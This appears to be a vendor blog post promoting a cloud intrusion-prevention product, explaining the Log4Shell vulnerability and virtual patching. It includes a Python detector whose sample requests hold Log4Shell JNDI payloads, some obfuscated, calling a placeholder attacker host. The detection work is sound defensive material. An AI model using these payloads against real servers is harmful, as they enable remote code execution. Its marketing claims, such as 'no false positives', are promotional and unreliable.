By Mor Ahuvia, Product Marketing Manager and Bob Bent, Partner Solutions Engineer

LOG4J lessons – How SASE protects from 0-day exploits

Log4J shows why the quality of threat prevention is so important in a SASE solution.

In the case of the Apache Log4J vulnerability, Check Point Harmony Connect (SASE) customers had an IPS protection within hours of the vulnerability’s disclosure. This means that even if SASE customers did not have time to patch their servers or update their applications, they were still protected by the automatic, real-time IPS signature updates in Harmony Connect SASE. No manual patch management is required.

Be prepared. Download the ESG Guide to SASE network security.

Log4J vulnerability in a nutshell

When rating a vulnerability, a severity score is assigned based on factors such as the attack vector (network vs. physical access), attack complexity (simple vs. complex), whether user interaction is required, and whether the attack requires privileged access. The impact of the attack is also considered, including its scope in terms of the number of vulnerable systems (one system vs. many). Can you guess where Log4J ranks on the severity scale, where a low score is 1 and a high score is 10?

While several Log4J-related issues were recently uncovered, the most severe one, officially named Apache Log4j Remote Code Execution (CVE-2021-44228), earned a severity score of 10.0 (out of 10.0!). The exploit of this vulnerability has been dubbed Log4Shell; it enables an attacker to run malicious code via a user directory lookup (using the LDAP protocol) by instructing it to retrieve a malicious object from a malicious website. The exploit can be performed on any server, application or client that runs a vulnerable version of the Log4J logging framework used in Java applications.

Unfortunately, Apache Log4j is the most popular Java logging library, with over 400,000 downloads from its GitHub project. And while not all of them process input, log their input, or necessarily use Log4J for logging, that number still gives a clue to the order of magnitude we are dealing with. For an excellent summary of how Log4J attacks work, read Check Point Research’s Laconic Log4J FAQ.

The power of virtual patching in preventing zero-day attacks

When time is of the essence, the ability to protect yourself against the newest zero-day vulnerabilities (CVEs) through virtual patching becomes critical.

An intrusion prevention system (IPS) works by virtually patching against known vulnerabilities in browsers, applications and systems (including the communication protocols used by these systems). Every time a security hole is disclosed, IPS and security vendors keep their customers protected by adding an IPS signature to address it—an IPS signature which may be based on a patch issued by a software vendor, volunteer open source developers, or even a security vendor’s own proprietary workaround.

Given their impact on live production systems, manually patching hundreds or thousands of servers can take days, weeks or even months. That is, if a patch is available in the first place. Not all vendors have patched their vulnerable Log4J products. This makes virtual patching a more practical and centralized method to mitigate new security risks and prevent the exploitation of these security holes. Case in point: since Check Point implemented its Log4J IPS protections, over 4,300,000 attempts to exploit the vulnerability have been prevented, affecting 48% of corporate networks worldwide.
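As an added illustration (not Check Point's code), here is a simplified, signature-style check of the kind an IPS applies to request fields before a vulnerable Log4J instance ever logs them: it URL-decodes the value, collapses the nested lookups used to disguise the string, and flags any remaining JNDI lookup. The sample request lines and the attacker.invalid host are constructed; the lookup forms handled (lower/upper and the ':-' default syntax) are Log4j's own.

```python
import re
from urllib.parse import unquote

# Innermost Log4j lookup, i.e. ${...} whose body holds no further ${...}.
_INNER = re.compile(r"\$\{([^${}]*)\}")

def _resolve(body: str) -> str:
    """Reduce one non-JNDI lookup to the literal text Log4j would substitute.

    Covers the obfuscation forms that commonly wrap Log4Shell probes:
      lower:X / upper:X   -> X case-mapped
      anything:-X         -> the default value X (Log4j ':-' syntax)
    Unknown lookups resolve to "" (Log4j leaves them empty without a default).
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, _, arg = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    return ""

def is_log4shell_probe(value: str, max_rounds: int = 64) -> bool:
    """True if `value` contains a JNDI lookup after decoding and de-nesting."""
    text = unquote(unquote(value))  # request fields are often double URL-encoded
    for _ in range(max_rounds):
        m = _INNER.search(text)
        if m is None:
            return False
        body = m.group(1)
        if body.lstrip().lower().startswith("jndi:"):
            return True
        text = text[: m.start()] + _resolve(body) + text[m.end():]
    return True  # nesting deeper than any legitimate log value: treat as hostile

# Constructed sample request lines (not real traffic); attacker.invalid is a placeholder.
SAMPLE_LINES = [
    "GET / HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64)",
    "GET / HTTP/1.1 User-Agent: ${jndi:ldap://attacker.invalid/a}",
    "GET / HTTP/1.1 X-Api-Version: ${${lower:j}ndi:${lower:l}dap://attacker.invalid/a}",
    "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fattacker.invalid%2Fa%7D HTTP/1.1",
    "GET / HTTP/1.1 User-Agent: ${date:yyyy-MM-dd} is a harmless lookup",
]

def flag_lines(lines):
    """Indexes of the lines a signature-style check would block."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]

if __name__ == "__main__":
    print("flagged:", flag_lines(SAMPLE_LINES))  # flagged: [1, 2, 3]
```

A production IPS signature also has to cope with other encodings and protocols, which is why vendor-maintained, automatically updated signatures beat a one-off regex on each server.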

The value of a cloud IPS in a SASE solution

A cloud-based intrusion prevention system (IPS) service, offered as part of a SASE solution such as Harmony Connect, means ALL of your potentially-vulnerable applications and users are protected within the shortest possible amount of time, EVEN IF your IT and security teams have not had time to patch all your servers, apps and agents.

By offloading patch management to a cloud IPS, not only can your organization stay out of the headlines, but your security team can also sleep better at night, knowing that through virtual patching, potentially vulnerable assets are protected.

In fact, shortly after the Log4j vulnerability was reported, all relevant protections were propagated across all Check Point products. SASE customers that had enabled automated security updates enjoyed this extra protection as soon as it was added (refer to sk176884).

Check Point’s industry-leading IPS contains over 11,000 signatures that protect against IT and IoT vulnerabilities, including 25 out of NSA’s top 25 vulnerabilities exploited in the wild. Furthermore, a sense of urgency is in our DNA: We are proud to lead with the shortest time to virtually patch against new exploits, whenever they are discovered, day or night, weekday or weekend.

Finally, we’re happy to share that Check Point did not have products or systems impacted by the vulnerability. We also stand out in the industry in this respect.

Keeping up with new variants via ThreatCloud

To keep up with the latest malware variants exploiting Log4J, Check Point products leverage ThreatCloud, which provides real-time threat intelligence derived from hundreds of millions of sensors worldwide in networks, endpoints and mobile devices. The brain behind our prevention prowess, ThreatCloud merges big data threat intelligence with advanced AI technologies to provide accurate prevention to all Check Point Software customers, with no false positives.

Stay Safe with Harmony Connect SASE

While unpleasant surprises are a given in the world of cyber security, a cloud-based IPS means ALL your applications and users can be protected within the shortest possible amount of time.

Check Point Harmony Connect offers a SASE approach to network security, making it easier for IT and security teams to protect remote users and branch offices, without compromising on security or speed.

To learn more, we invite you to check out these resources:
